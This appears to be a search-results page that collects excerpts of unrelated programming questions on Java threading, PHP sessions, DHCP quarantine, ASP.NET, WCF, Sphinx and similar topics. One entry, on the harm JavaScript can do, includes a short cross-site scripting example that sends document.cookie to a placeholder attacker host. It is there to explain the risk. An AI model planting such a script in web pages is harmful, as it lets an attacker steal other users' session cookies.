Search Results

Search found 22756 results on 911 pages for 'cisco vpn client'.

Page 462/911 | < Previous Page | 458 459 460 461 462 463 464 465 466 467 468 469  | Next Page >

  • notify listener inside or outside inner synchronization

    - by Jary Zeels
    Hello all, I am struggling with a decision. I am writing a thread-safe library/API. Listeners can be registered, so the client is notified when something interesting happens. Which of the two implementations is more common?

        class MyModule {
            protected Listener listener;
            protected void somethingHappens() {
                synchronized(this) {
                    ... do useful stuff ...
                    listener.notify();
                }
            }
        }

    or

        class MyModule {
            protected Listener listener;
            protected void somethingHappens() {
                Listener l = null;
                synchronized(this) {
                    ... do useful stuff ...
                    l = listener;
                }
                l.notify();
            }
        }

    In the first implementation, the listener is notified inside the synchronized block. In the second, it is notified outside the synchronized block. I feel that the second one is advisable, as it leaves less room for potential deadlocks, but I am having trouble convincing myself. A downside of the second implementation is that the client might receive 'incorrect' notifications, which happens if it accessed the module prior to the l.notify() statement. Thanks a lot.
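
    For what it's worth, here is a minimal sketch of the second approach with a listener list (the Listener interface and its onEvent callback are illustrative, not the poster's API). Snapshotting state under the lock and calling back outside it means a listener that re-enters the module, or takes its own locks, cannot deadlock against the module's lock:

    ```java
    import java.util.List;
    import java.util.concurrent.CopyOnWriteArrayList;

    public class MyModule {
        // Hypothetical callback interface, standing in for the poster's Listener.
        public interface Listener { void onEvent(int newState); }

        private final List<Listener> listeners = new CopyOnWriteArrayList<Listener>();
        private int state; // guarded by 'this'

        public void addListener(Listener l) { listeners.add(l); }

        public void somethingHappens() {
            int snapshot;
            synchronized (this) {
                state++;            // ... do useful stuff under the lock ...
                snapshot = state;   // capture what this notification should report
            }
            // Notify outside the lock; CopyOnWriteArrayList iteration stays safe
            // even if a callback registers or removes listeners.
            for (Listener l : listeners) {
                l.onEvent(snapshot);
            }
        }
    }
    ```

    Passing the captured state to the callback also addresses the "incorrect notification" worry: each listener sees the value the notification was generated for, even if another thread changes the module before the callback runs.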

    Read the article

  • Very slow remote page load performance in QtWebKit (Windows)

    - by Gil
    I get very slow load times with QtWebKit on Windows 7 over ADSL. I am using the Qt Demo Browser on a 2 GHz Core 2 Quad with 4 GB RAM and 64-bit Windows 7, connecting through a VPN. Simplest example: the Google search page takes ~18 seconds to load, compared to 2.5 seconds in Chrome (cache cleared). On larger pages, with scripts etc., it is worse. I tried Qt 4.6 and also the Qt 4.7 beta, but don't see any difference. I see the same results with the Arora browser. Are there any settings or patches that can be applied to fix this? Thanks

    Read the article

  • How should I implement lazy session creation in PHP?

    - by Adam Franco
    By default, PHP's session handling mechanisms set a session cookie header and store a session even if there is no data in the session. If no data is set in the session then I don't want a Set-Cookie header sent to the client in the response and I don't want an empty session record stored on the server. If data is added to $_SESSION, then the normal behavior should continue. My goal is to implement lazy session creation behavior of the sort used by Drupal 7 and Pressflow, where no session is stored (or session cookie header sent) unless data is added to the $_SESSION array during application execution. The point of this behavior is to allow reverse proxies such as Varnish to cache and serve anonymous traffic while letting authenticated requests pass through to Apache/PHP. Varnish (or another proxy server) is configured to pass through any requests without cookies, assuming correctly that if a cookie exists then the request is for a particular client. I have ported the session handling code from Pressflow that uses session_set_save_handler() and overrides the implementation of session_write() to check for data in the $_SESSION array before saving; I will write this up as a library and add an answer here if this is the best/only route to take. My question: while I can implement a fully custom session_set_save_handler() system, is there an easier way to get this lazy session creation behavior in a relatively generic way that would be transparent to most applications?

    Read the article

  • Microsoft Windows DHCP: Steering IPv4 clients into specific scopes based on MAC

    - by Easter Sunshine
    We have visitors on our campus who bring their own laptops and devices and use our wireless and wired networks. When we receive a copyright infringement notice (typically BitTorrenting), we are required to quarantine that MAC address so that it no longer has Internet access. No matter what website it tries to visit, it is sent to a web page explaining to the user that the device has been quarantined. We have thus far implemented this in ISC DHCP on Linux. We have multiple VLANs with one or more public-IP subnets and one RFC1918 quarantine subnet each. All clients are leased IPs in the public-IP subnet(s) unless the MAC is in a list of known bad MACs; in that case, you are sent to the quarantine subnet so that your traffic is unroutable on the Internet (you are isolated by subnet only, not by VLAN). We would like to move to Windows DHCP in light of the IPAM role, but I cannot figure out how to replicate this in Windows DHCP 2012 (Assign DHCP IPs for specific MAC prefixes on Windows Server 2008 R2 suggests it was not possible in 2008 R2), even while using policies. So here's what I'd like: the administrator/help desk provides and maintains a list of MAC addresses that are to be quarantined, and the DHCP server places those MACs into the quarantine subnet on the respective VLAN, no matter which VLAN the client is in. I don't think reservations would work: we currently have about 300 registered bad MACs and about 12 VLANs. I don't want to make 300 x 12 reservations nor have to add 12 reservations per new MAC address. Not to mention all of the quarantine subnets are /24s. We do not have NPS/NAC. You do not have to register your MAC address to get network access. We use Cisco routers/switches. Thanks.

    Read the article

  • How do you clear a CustomValidator Error on a Button click event?

    - by George
    I have a composite user control for entering dates. The CustomValidator will include server-side validation code. I would like the error message to be cleared via client-side script if the user alters the date value in any way. To do this, I included the following code to hook up the two drop-downs and the year text box to the validation control:

        <script type="text/javascript">
            ValidatorHookupControlID("<%= ddlMonth.ClientID%>", document.getElementById("<%= CustomValidator1.ClientID%>"));
            ValidatorHookupControlID("<%= ddlDate.ClientID%>", document.getElementById("<%= CustomValidator1.ClientID%>"));
            ValidatorHookupControlID("<%= txtYear.ClientID%>", document.getElementById("<%= CustomValidator1.ClientID%>"));
        </script>

    However, I would also like the validation error to be cleared when the user clicks the Clear button, which resets the other three controls. To avoid a postback, the Clear button is a regular HTML button with an OnClick event that resets the three controls. Unfortunately, the ValidatorHookupControlID method does not seem to work on HTML controls, so I thought I would change the HTML button to an ASP button and hook up to that control instead. However, I cannot seem to eliminate the postback behaviour associated by default with the ASP button control. I tried setting UseSubmitBehavior to False, but it still submits. I tried returning false in my btnClear_OnClick client code, but the code sent to the browser included a DoPostBack call after my call:

        btnClear.Attributes.Add("onClick", "btnClear_OnClick();")

    Instead of adding OnClick code, I tried overwriting it, but the DoPostBack code was still included in the final markup sent to the browser:

        btnClear.Attributes.Item("onClick") = "btnClear_OnClick();"

    What do I have to do to get the Clear button to clear the CustomValidator error when clicked and avoid a postback?
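
    One possibility (a sketch only, not tested against the poster's markup; the control IDs are the ones used above, and Page_Validators/ValidatorUpdateDisplay are the standard ASP.NET client-validation globals) is to keep the Clear button as an asp:Button but cancel the submit from OnClientClick and reset the validator there:

    ```javascript
    // Wired up in markup, e.g.:
    //   <asp:Button ID="btnClear" runat="server" Text="Clear"
    //               OnClientClick="return btnClear_OnClick();" />
    // Returning false from OnClientClick stops the generated submit/__doPostBack.
    function btnClear_OnClick() {
        // Reset the three date controls (IDs as in the hookup script above).
        document.getElementById('<%= ddlMonth.ClientID %>').selectedIndex = 0;
        document.getElementById('<%= ddlDate.ClientID %>').selectedIndex = 0;
        document.getElementById('<%= txtYear.ClientID %>').value = '';

        // Clear the CustomValidator's error message via the client validation API.
        var val = document.getElementById('<%= CustomValidator1.ClientID %>');
        if (val && typeof ValidatorUpdateDisplay === 'function') {
            val.isvalid = true;
            ValidatorUpdateDisplay(val);
        }
        return false; // no postback
    }
    ```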

    Read the article

  • What harm can javascript do?

    - by The King
    I just happened to read Joel's blog here... So for example if you have a web page that says “What is your name?” with an edit box and then submitting that page takes you to another page that says, Hello, Elmer! (assuming the user’s name is Elmer), well, that’s a security vulnerability, because the user could type in all kinds of weird HTML and JavaScript instead of “Elmer” and their weird JavaScript could do narsty things, and now those narsty things appear to come from you, so for example they can read cookies that you put there and forward them on to Dr. Evil’s evil site. Since JavaScript runs on the client, all it can access or do is on the client. It can read information stored in hidden fields and change it. It can read, write or manipulate cookies... But I feel this information is available to the user anyway (if he is smart enough to pass JavaScript in a textbox), so we are not empowering him with new information or providing him undue access to our server. Just curious to know whether I am missing something. Can you list the things that a malicious user can do with this security hole? Edit: Thanks to all for the enlightenment. As kizzx2 pointed out in one of the comments, I was overlooking the fact that JavaScript written by User A may get executed in the browser of User B under numerous circumstances, in which case it becomes a great risk.
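
    To make the User A / User B point concrete, here is a minimal stored-XSS payload (the attacker's collection URL is made up): if the submitted name is echoed back unescaped on a page that other users later view, User A can enter something like this, and it runs with every viewer's cookies, not User A's own:

    ```html
    <!-- Entered by User A into the "name" field; rendered unescaped for User B. -->
    <script>
      // Sends User B's cookies for *your* site to a server the attacker controls.
      new Image().src = 'http://evil.example.com/steal?c=' +
                        encodeURIComponent(document.cookie);
    </script>
    ```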

    Read the article

  • Creating a single CRM plugin DLL to store in the CRM database

    - by Shaamaan
    Since the suggested way of storing plugins in MS CRM is via the CRM database, I figured it's about time to do something about the method I'm currently using, which is storing the DLLs on the disk. The trouble, however, is that I don't know how to embed all the other various bits that are needed by the DLL: the localization resource files (which are kept in another folder) and some referenced DLLs from the latest SDK (which had to be manually placed in the bin\assembly folder). At this point, I'm not even entirely sure this is possible. So far I've tried to solve the localization problem by changing the build action on the resource files to "Content" or "Resource" and tested this solution (still keeping the location on-disk, but without the added localization folder). This didn't work: when I purposely generated a validation error in one of the plugins, I got the default language message (English) despite having a different language selected in the CRM. I've faced a similar problem when trying to add some of the referenced DLL files (namely the new SDK DLLs: xrm.portal, xrm.portal.files and xrm.client). When I tried to store the plugin in the database (skipping for a moment the localization issue), I got a CRM error saying it cannot find the XRM.Client assembly or one of its dependencies. I know I could use ILMerge to put the whole thing together, but I've got a gut feeling telling me this isn't really a good idea. Any hints or suggestions on this issue would be great.

    Read the article

  • Rewriting Live TCP Streams

    - by user213060
    I want to rewrite TCP/IP streams. Ettercap's etterfilter command lets you perform simple live replacements of TCP/IP data based on fixed strings or regexes. Example: http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833 I would like to rewrite streams based on my own filter program instead of just simple string replacements. Anyone have an idea of how to do this? Is there anything other than Ettercap that can do live replacement like this, maybe as a plugin to VPN software or something? Thanks!

    Read the article

  • Response.Redirect() will not redirect on Internet Explorer

    - by Amit
    Hi, I am using Response.Redirect("someurl", true); in the Page_PreInit event to redirect all the requests that come to a page. It works fine in Firefox, but if I access the page from Internet Explorer 7/8, it says the page cannot be found and will not redirect to the new URL. Any idea why this happens? Update: I tried giving a random URL in the redirect, such as google.com, and it works fine. Actually the URL I am trying to redirect to is not accessible on my machine; it is on another VPN. I guess IE will not change the URL in the address bar if it cannot access the URL. Firefox, on the other hand, changes the address in the address bar.

    Read the article

  • What issues to consider when rolling your own data-backend for Silverlight / AJAX on non-ASP.NET servers

    - by Edward Tanguay
    I have read-only Silverlight and AJAX apps which read static text and XML files from a PHP/Apache server. This works very nicely: asynchronous loading, lazy-loading only what I need for each page, loading in the background, and a little query language I developed to get a PHP script to create custom XML files. It's pragmatic read-only REST, and it all works fast and fine for read-only sites. Now I want to also add the ability to write data from these apps to a database on the same PHP/Apache server. For those of you who have built similar data-access layers, what do I need to consider while building this, especially regarding security, so that not just any client can write to and alter my database? For example:

    - check HTTP_USER_AGENT for security
    - check REMOTE_ADDR for security
    - require a special code for security, perhaps a list of TAN codes (such as banks use for online transactions), each of which can only be used once; both the client and server have these

    I wonder if there is some kind of standard REST query I should lean on for e.g. building SQL-like statements in the URL parameters, e.g. http://www.thedatalayersite.com/query?insertinto=customers&... Any thoughts, notes from experience, ideas, gotchas, and especially ideas on tightening down security in this endeavor would be helpful.
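
    As one illustration of the one-time-code idea (a sketch only, using jQuery for brevity; the endpoint URL is the example one from the question and the token handling is made up), the client attaches the next unused code to each write, and the PHP side rejects requests whose code it never issued or has already seen:

    ```javascript
    // Sketch: send a one-time code (TAN) with every write request.
    var nextToken = tanList.shift();   // tanList: codes previously issued to this client

    $.ajax({
        type: "POST",
        url: "http://www.thedatalayersite.com/query",
        data: {
            insertinto: "customers",
            name: "Example Customer",
            token: nextToken            // server marks the code as used, or rejects the write
        },
        success: function () { /* optionally fetch a fresh batch of codes */ },
        error: function ()   { /* token refused: re-authenticate and retry */ }
    });
    ```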

    Read the article

  • VS2010 and CSS: What is the best strategy to individually position form controls

    - by George
    OK, I have a ton of controls on my page that I need to individually place. I need to set a margin here, a padding there, etc. None of these particular styles will be applied to more than one control. What is the best practice for determining at which level the style is placed? My choices are:

    1) External CSS file
       1A) Using ClientIDMode = Auto (the default), I could assign a unique CssClass value to the ASP.NET control and, in the external CSS file, create a class selector that would only be applied to that one control.
       1B) Using ClientIDMode = Predictable, I could determine what the ID will be for the controls of interest and create an ID selector in the external CSS file (#ControlID { style }). However, I fear maintenance issues: including or removing parent containers would cause the ID to change.
       1C) Using ClientIDMode = Static, I could choose static IDs for the controls such that I minimize the likelihood of a clash with auto-generated IDs (perhaps by prefixing the ID with "StaticID_") and use an external stylesheet with ID selectors.
    2) I could place the style right on the control. The only disadvantage here, as I see it, is that the style info is brought down each time instead of being cached, which is what I'd get with an external CSS file.

    If a style isn't reused, I personally don't see much benefit to placing it in an external file, though please explain why if you disagree. Is there more of a reason than "it's nice to have all the CSS in one place"?
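
    For option 1C, the external file would just carry one ID selector per control (the IDs and values below are illustrative, assuming the controls are given static ClientIDs as described):

    ```css
    /* External stylesheet, option 1C: one rule per individually-placed control. */
    #StaticID_txtFirstName { margin-left: 12px; }
    #StaticID_ddlCountry   { padding-top: 4px; margin-right: 8px; }
    #StaticID_btnSave      { margin-top: 16px; }
    ```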

    Read the article

  • Django sphinx works only after app restart.

    - by Lhiash
    Hi, I've set up django-sphinx in my project, and it works perfectly, but only for some time. After that it always returns an empty result set. Surprisingly, restarting the Django app fixes it, and search works again, but again only for a short time (or a very limited number of queries). Here's my sphinx.conf:

        source src_questions {
            # data source
            type     = mysql
            sql_host = xxxxxx
            sql_user = xxxxxx   # replace with your db username
            sql_pass = xxxxxx   # replace with your db password
            sql_db   = xxxxxx   # replace with your db name
            # these two are optional
            sql_port = xxxxxx
            #sql_sock = /var/lib/mysql/mysql.sock

            # pre-query, executed before the main fetch query
            sql_query_pre = SET NAMES utf8

            # main document fetch query
            sql_query = SELECT q.id AS id, q.title AS title, q.tagnames AS tags, q.html AS text, q.level AS level \
                FROM question AS q \
                WHERE q.deleted=0

            # optional - used by command-line search utility to display document information
            sql_query_info = SELECT title, id, level FROM question WHERE id=$id

            sql_attr_uint = level
        }

        index questions {
            # which document source to index
            source = src_questions

            # this is path and index file name without extension
            # you may need to change this path or create this folder
            path = /home/rafal/core_index/index_questions

            # docinfo (ie. per-document attribute values) storage strategy
            docinfo = extern

            # morphology
            morphology = stem_en

            # stopwords file
            #stopwords = /var/data/sphinx/stopwords.txt

            # minimum word length
            min_word_len = 3

            # uncomment next 2 lines to allow wildcard (*) searches
            min_infix_len = 1
            enable_star = 1

            # charset encoding type
            charset_type = utf-8
        }

        # indexer settings
        indexer {
            # memory limit (default is 32M)
            mem_limit = 64M
        }

        # searchd settings
        searchd {
            # IP address on which search daemon will bind and accept
            # optional, default is to listen on all addresses,
            # ie. address = 0.0.0.0
            address = 127.0.0.1

            # port on which search daemon will listen
            port = 3312

            # searchd run info is logged here - create or change the folder
            log = ../log/sphinx.log

            # all the search queries are logged here
            query_log = ../log/query.log

            # client read timeout, seconds
            read_timeout = 5

            # maximum amount of children to fork
            max_children = 30

            # a file which will contain searchd process ID
            pid_file = searchd.pid

            # maximum amount of matches this daemon would ever retrieve
            # from each index and serve to client
            max_matches = 1000
        }

    and here's the search part of my views.py:

        content = Question.search.query(keywords)
        if level:
            content = content.filter(level=level)  # level is an array of integers

    There are no errors in any logs, it just isn't returning any results. All help would be most appreciated.

    Read the article

  • svn commit is hung at start of commit

    - by jwhitlock
    I'm committing a large changeset, including a large binary file (180 MB), over a slow VPN connection. It looks for all the world like it is stalled. How can I diagnose where it is stuck? The output is:

        $ svn commit -m "My commit message"
        Connecting to deprecated signal QDBusConnectionInterface::serviceOwnerChanged(QString,QString,QString)

    The local Subversion is 1.6.9 on Linux, KDE 4.3, and svn status shows:

        ML  .
        L   ws
        M   ws/manage.py
        L   ws/locales
        L   ws/locales/ja_JP
        L   ws/locales/ja_JP/LC_MESSAGES

    The process isn't using much of any resources. The server is Linux, served by Apache and mod_dav_svn, same Subversion 1.6.9. I can't see any process that is handling the commit.

    Read the article

  • Call WCF Service Through Javascript, AJAX, or JQuery

    - by obautista
    I created a number of standard WCF services (the service contract and host (.svc) are in separate assemblies). I fired up a web site in IIS to host the services (i.e., the address is http://services:1000/wcfservices.svc). Then in my web site project I added the reference, and I am able to call the services normally. Now I need to call some of the services client-side. I'm not sure if I should be looking at articles on calling WCF services through AJAX, jQuery, or JSON-enabled WCF services. Can anyone provide any thoughts or experience with configuring this? Some of the changes I made: I added the following to the operation contract:

        [OperationContract]
        [WebInvoke(Method = "POST", UriTemplate = "SetFoo")]
        void SetFoo(string Id);

    Then this above the implementation of the interface:

        [AspNetCompatibilityRequirements(RequirementsMode = AspNetCompatibilityRequirementsMode.Allowed)]

    Then in the service web.config I have this:

        <serviceHostingEnvironment aspNetCompatibilityEnabled="true">
            <baseAddressPrefixFilters>
                <add prefix="http://services:1000/wcfservices.svc/"/>
            </baseAddressPrefixFilters>
        </serviceHostingEnvironment>
        <serviceHostingEnvironment multipleSiteBindingsEnabled="false" />

    Then on the client side I attempted this:

        <asp:ScriptManagerProxy ID="ScriptManagerProxy1" runat="server">
            <CompositeScript>
                <Scripts>
                    <asp:ScriptReference Path="http://Flixsit:1000/FlixsitWebServices.svc" />
                </Scripts>
            </CompositeScript>
        </asp:ScriptManagerProxy>

    I am attempting to call the service like this in JavaScript:

        wcfservices.SetFoo(string Id);

    Nothing is working. If it is a better idea to use JSON-enabled services, jQuery, etc., I am willing to make any changes. Thanks for any suggestions/tips provided.
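
    For the jQuery/JSON route, a call against the SetFoo operation would look roughly like the sketch below. This assumes the endpoint uses webHttpBinding with a webHttp behavior and that the operation is marked with BodyStyle = WrappedRequest and RequestFormat/ResponseFormat = WebMessageFormat.Json (as in the usual JSON-enabled WCF samples); the page also has to be served from the same host as the .svc, or the browser's same-origin policy will block the call:

    ```javascript
    // Sketch: POST { "Id": "..." } to the SetFoo UriTemplate of the .svc endpoint.
    $.ajax({
        type: "POST",
        url: "http://services:1000/wcfservices.svc/SetFoo",
        contentType: "application/json; charset=utf-8",
        data: JSON.stringify({ Id: "42" }),   // property name must match the operation parameter
        dataType: "json",
        success: function () { alert("SetFoo succeeded"); },
        error: function (xhr, status, err) { alert("SetFoo failed: " + status + " " + err); }
    });
    ```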

    Read the article

  • Which JavaScript framework for me?

    - by LeonixSolutions
    This is not meant to be a subjective question, nor is it intended to start a religious war. Which JavaScript framework is right for me? Until now, I haven't coded any JS at all (no biggie, it's just another language). I have been set in my ways and eschewed any client-side code, lest the user have JS turned off, or try to "just change this a little, to see what happens" - and then expect me to support it. So, until now it has all been server-side, with PHP and an ODBC-compliant database. However, I am beginning to see advantages to client-side input validation and an improved graphical experience for users, which would help me produce more professional web-based applications. I am looking for a framework which:

    - doesn't have a steep learning curve
    - is full-featured, although that does not mean that the one with the most features wins (remember the 80/20 rule)
    - is mature and stable (even if still in development)
    - integrates well with common IDEs if possible; I use NetBeans for PHP (and occasionally MS Visual Studio for C# - I seem to have drifted away from Eclipse)
    - allows me to develop web sites/apps for mobile devices
    - support for Google charts (or other charting) would be a bonus
    - has good AJAX/JSON support, but I imagine that they all do

    Taking that into consideration, is there a "right" framework for me, or does it not really matter? I looked briefly at jQuery and jQuery UI and liked what I saw, but I really don't have time, owing to deadlines, to try them all out and see which one suits me, much as I know that I ought to.

    Read the article

  • Shoulda and Paperclip testing

    - by trobrock
    I am trying to test a couple of models that have an attachment with Paperclip. I have all of my validations passing except for the content-type check.

        # myapp/test/unit/project_test.rb
        should_have_attached_file :logo
        should_validate_attachment_presence :logo
        should validate_attachment_size(:logo).less_than(1.megabyte)
        should_validate_attachment_content_type :logo,
          :valid => ["image/png", "image/jpeg", "image/pjpeg", "image/x-png"]

        # myapp/app/models/project.rb
        has_attached_file :logo, :styles => { :small => "100x100>", :medium => "200x200>" }
        validates_attachment_presence :logo
        validates_attachment_size :logo, :less_than => 1.megabyte
        validates_attachment_content_type :logo,
          :content_type => ["image/png", "image/jpeg", "image/pjpeg", "image/x-png"]

    The errors I am getting:

        1) Failure:
        test: Client should validate the content types allowed on attachment logo. (ClientTest)
        [/Library/Ruby/Gems/1.8/gems/thoughtbot-shoulda-2.10.2/lib/shoulda/assertions.rb:55:in `assert_accepts'
         vendor/plugins/paperclip/shoulda_macros/paperclip.rb:44:in `__bind_1276100387_499280'
         /Library/Ruby/Gems/1.8/gems/thoughtbot-shoulda-2.10.2/lib/shoulda/context.rb:351:in `call'
         /Library/Ruby/Gems/1.8/gems/thoughtbot-shoulda-2.10.2/lib/shoulda/context.rb:351:in `test: Client should validate the content types allowed on attachment logo. ']:
        Content types image/png, image/jpeg, image/pjpeg, image/x-png should be accepted and rejected by logo

    This happens on two different models that are set up the same way.

    Read the article

  • Any HTTP proxies with explicit, configurable support for request/response buffering and delayed connections?

    - by Carlos Carrasco
    When dealing with mobile clients it is very common to have multi-second delays during the transmission of HTTP requests. If you are serving pages or services out of a prefork Apache, the child processes will be tied up for seconds serving a single mobile client, even if your app server logic is done in 5 ms. I am looking for an HTTP server, balancer or proxy server that supports the following:

    1. A request arrives at the proxy. The proxy starts buffering the request in RAM or on disk, including headers and POST/PUT bodies. The proxy DOES NOT open a connection to the backend server. This is probably the most important part.
    2. The proxy server stops buffering the request when a size limit has been reached (say, 4 KB), or the request has been received completely, headers and body.
    3. Only now, with (part of) the request in memory, a connection is opened to the backend and the request is relayed.
    4. The backend sends back the response. Again the proxy server starts buffering it immediately (up to a more generous size, say 64 KB).
    5. Since the proxy has a big enough buffer, the backend response is stored completely in the proxy server in a matter of milliseconds, and the backend process/thread is free to process more requests. The backend connection is immediately closed.
    6. The proxy sends the response back to the mobile client, as fast or as slow as the client is capable of, without having a connection to the backend tying up resources.

    I am fairly sure you can do 4-6 with Squid, and nginx appears to support 1-3 (and looks fairly unique in this respect). My question is: is there any proxy server that emphasizes these buffering and not-opening-connections-until-ready capabilities? Maybe there is just a bit of Apache config-fu that makes this buffering behaviour trivial? Any of them that is not a dinosaur like Squid and that supports a lean single-process, asynchronous, event-based execution model? (Side rant: I would be using nginx but it doesn't support chunked POST bodies, making it useless for serving stuff to mobile clients. Yes, cheap $50 handsets love chunked POSTs... sigh)

    Read the article

  • Pros and cons of MPMoviePlayerController versus launching UIWebView to stream movie

    - by Nosredna
    I have a client who has video content for the web in Flash format. My task is to help them show the videos in an iPhone app. I realize that step one is to get these videos into the appropriate Quicktime format for the iPhone. Then I'm going to have to help the client figure out how or where to host these files. If that's tricky I assume they can be hosted at YouTube. My chief concern, though, is which approach to take to stream the video. What are the pros and cons of MPMoviePlayerController versus launching UIWebView with the URL of the stream? Is there any difference? Is one of them more or less forgiving? Is one of them a better user experience? Any gotchas I might expect to run into? I'm assuming playing video is pretty easy on the iPhone. Is it reasonable to try both and have one available as a fallback, or would that be a waste of time? I'm trying to schedule this out a bit, so I'd love to hear real-world experiences from anyone who's done this.

    Read the article

  • Multiple, Simultaneous Factories and Protocols in Twisted: Same Service, Different Ports

    - by RichardCroasher
    Greetings, Forum. I'm working on a program in Python that uses Twisted to manage networking. The basis of this program is a TCP service that is to listen for connections on multiple ports. However, instead of using one Twisted factory to handle a protocol object for each port, I am trying to use a separate factory for each port. The reason for this is to force a separation among the groups of clients connecting to the different ports. Unfortunately, it appears that this architecture isn't quite working: clients that connect to one port appear to be available among all the factories (e.g., the protocol class used by each factory includes a 'self.factory.clients.append(self)' statement... instead of adding a given client to just the factory for a particular port, the client is added to all factories), and whenever I shut down service on one port the listeners on all ports also stop. I've been working with Twisted for a short while, and fear I simply don't fully understand how its factory classes are managed. My question is: is it simply not possible to have multiple, simultaneous instances of the same factory and same protocol in use across different ports (without these instances stepping on each other's toes)?
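
    It is certainly possible to run one factory instance per port; a minimal sketch is below (class names and port numbers are made up). The usual cause of the symptom described - every client showing up in every factory - is a clients list defined as a class attribute rather than created per instance in __init__, though without seeing the code that is only a guess:

    ```python
    from twisted.internet import protocol, reactor

    class MyProtocol(protocol.Protocol):
        def connectionMade(self):
            # Registers with the factory that created this protocol only.
            self.factory.clients.append(self)

        def connectionLost(self, reason):
            self.factory.clients.remove(self)

    class MyFactory(protocol.ServerFactory):
        protocol = MyProtocol

        def __init__(self):
            # Per-instance list. A class-level `clients = []` would be shared by
            # every MyFactory instance, making clients appear in all factories.
            self.clients = []

    # One independent factory (and listener) per port; stopping one listener
    # with port.stopListening() leaves the others running.
    ports = {}
    for port_number in (8001, 8002, 8003):
        ports[port_number] = reactor.listenTCP(port_number, MyFactory())

    reactor.run()
    ```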

    Read the article

  • DNS requests failing from computers that can ping DNS server

    - by dunxd
    I have a situation where computers in some of our remote offices from time to time lose the ability to use our DNS server (in head office) to resolve hostnames. The offices are connected via VPN using Cisco ASA 5505 (VPNclient config rather than Site to Site). Ping to the IP address of the DNS server works. But nslookup will get a "no response from server" message. Computers in other locations can use DNS fine. This is an intermittent problem. One day/hour it works, another it doesn't. Other offices connected in the same way work when another doesn't. No config changes have been made on routers around the time we see the problem. Some users have reported that the problem goes away after doing a repair connection in Windows XP. I think this could be caused by the DNS cache being flushed as part of this - the Windows DNS cache makes the intermittent problem look less so because it caches failed lookups as well as successful ones. However, it is possible some other aspect of Windows is involved. Windows 7 clients have also had the same problem. Any pointers on deeper troubleshooting, or anyone else found this?

    Read the article

  • Exception Handling in ASP.NET MVC and Ajax - [HandleException] filter

    - by Graham
    All, I'm learning MVC and using it for a business app (MVC 1.0). I'm really struggling to get my head around exception handling. I've spent a lot of time on the web but not found anything along the lines of what I'm after. We currently use a filter attribute that implements IExceptionFilter. We decorate a base controller class with this so all server-side exceptions are nicely routed to an exception page that displays the error and performs logging. I've started to use AJAX calls that return JSON data, but when the server-side implementation throws an error, the filter is fired, yet the page does not redirect to the error page - it just stays on the page that called the AJAX method. Is there any way to force the redirect on the server (e.g. an ASP.NET Server.Transfer or redirect)? I've read that I must return a JSON object (wrapping the .NET exception) and then redirect on the client, but then I can't guarantee the client will redirect... and (although I'm probably doing something wrong) when the server attempts to redirect, it gets an unauthorised exception (the base controller is secured, but the Exception controller is not, as it does not inherit from it). Has anybody got a simple example (.NET and jQuery code)? I feel like I'm randomly trying things in the hope it will work. Exception filter so far:

        public class HandleExceptionAttribute : FilterAttribute, IExceptionFilter
        {
            #region IExceptionFilter Members

            public void OnException(ExceptionContext filterContext)
            {
                if (filterContext.ExceptionHandled)
                {
                    return;
                }

                filterContext.Controller.TempData[CommonLookup.ExceptionObject] = filterContext.Exception;

                if (filterContext.HttpContext.Request.IsAjaxRequest())
                {
                    filterContext.Result = AjaxException(filterContext.Exception.Message, filterContext);
                }
                else
                {
                    // Redirect to global handler
                    filterContext.Result = new RedirectToRouteResult(new RouteValueDictionary(
                        new { controller = AvailableControllers.Exception, action = AvailableActions.HandleException }));
                    filterContext.ExceptionHandled = true;
                    filterContext.HttpContext.Response.Clear();
                }
            }

            #endregion

            private JsonResult AjaxException(string message, ExceptionContext filterContext)
            {
                if (string.IsNullOrEmpty(message))
                {
                    message = "Server error"; // TODO: Replace with better message
                }

                filterContext.HttpContext.Response.StatusCode = (int)HttpStatusCode.InternalServerError;
                filterContext.HttpContext.Response.TrySkipIisCustomErrors = true; // Needed for IIS 7.0

                return new JsonResult
                {
                    Data = new { ErrorMessage = message },
                    ContentEncoding = Encoding.UTF8,
                };
            }
        }
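
    On the client, one common pattern is a global handler that redirects whenever an AJAX call comes back with a 500. This is only a sketch: the ErrorMessage property matches the JSON returned by the filter above, but the /Exception/HandleException URL (guessed from the AvailableControllers/AvailableActions constants) and the idea of passing the message as a query-string parameter are assumptions that would need matching server-side support:

    ```javascript
    // Redirect to the error page whenever any jQuery AJAX call fails with a server error.
    $(document).ajaxError(function (event, xhr) {
        if (xhr.status === 500) {
            var message = "";
            try {
                // The filter returns { "ErrorMessage": "..." } as JSON.
                message = $.parseJSON(xhr.responseText).ErrorMessage;
            } catch (e) { /* response was not JSON - fall through */ }
            window.location.href = "/Exception/HandleException?message=" +
                                   encodeURIComponent(message);
        }
    });
    ```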

    Read the article

  • When connecting SAP Business One to SQL Server 2005, what is the best practice for client logins?

    - by Nick
    We have SAP Business One - Fourth Shift Edition running here at a small manufacturing company. The consulting company that has come in to do the installation/implementation uses the "sa" id/password to initially connect to the database to get the list of companies. From then on, I have to assume that it's the sa id/password that is being used to connect the client software to the database. Is this appropriate? I don't know where this data is being stored... as an ODBC connection? Directly in the registry somewhere? Is it secure? Would it be better to set the user's network ID in the database security and then use the "trusted connection" setting instead? Or do most people create a separate login in the database for each user and use that in the client settings? It seems like the easiest way would be to add the user's network login to the SQL Server security so they can use the "trusted connection"... but then wouldn't that allow ANY software to connect to the database from that machine? So anyway: what are the best practices for setting this up?
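
    For reference, the trusted-connection route usually looks something like this on the SQL Server side (a sketch only - the domain group, database name and role memberships are illustrative, and deciding exactly what those logins may touch is the part that needs the real thought):

    ```sql
    -- Create one Windows login for a domain group instead of everyone sharing "sa".
    CREATE LOGIN [ACME\SapB1Users] FROM WINDOWS;
    GO
    USE SBO_CompanyDB;   -- the company database
    GO
    CREATE USER [ACME\SapB1Users] FOR LOGIN [ACME\SapB1Users];
    -- Grant only what the client application actually needs.
    EXEC sp_addrolemember 'db_datareader', 'ACME\SapB1Users';
    EXEC sp_addrolemember 'db_datawriter', 'ACME\SapB1Users';
    ```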

    Read the article

  • Cascading input control is empty while accessing a Jasper Report

    - by Yogesh R
    I call a Jasper report through an independent URL, through which I pass one of the input controls needed to run the report. E.g.:

        http://localhost:8080/jasperserver/flow.html?_flowId=viewReportFlow&standAlone=true&reportUnit=xyz&ParentFolderUri=abcd&j_username=xyz&j_password=xyz&parameter1=value1&...

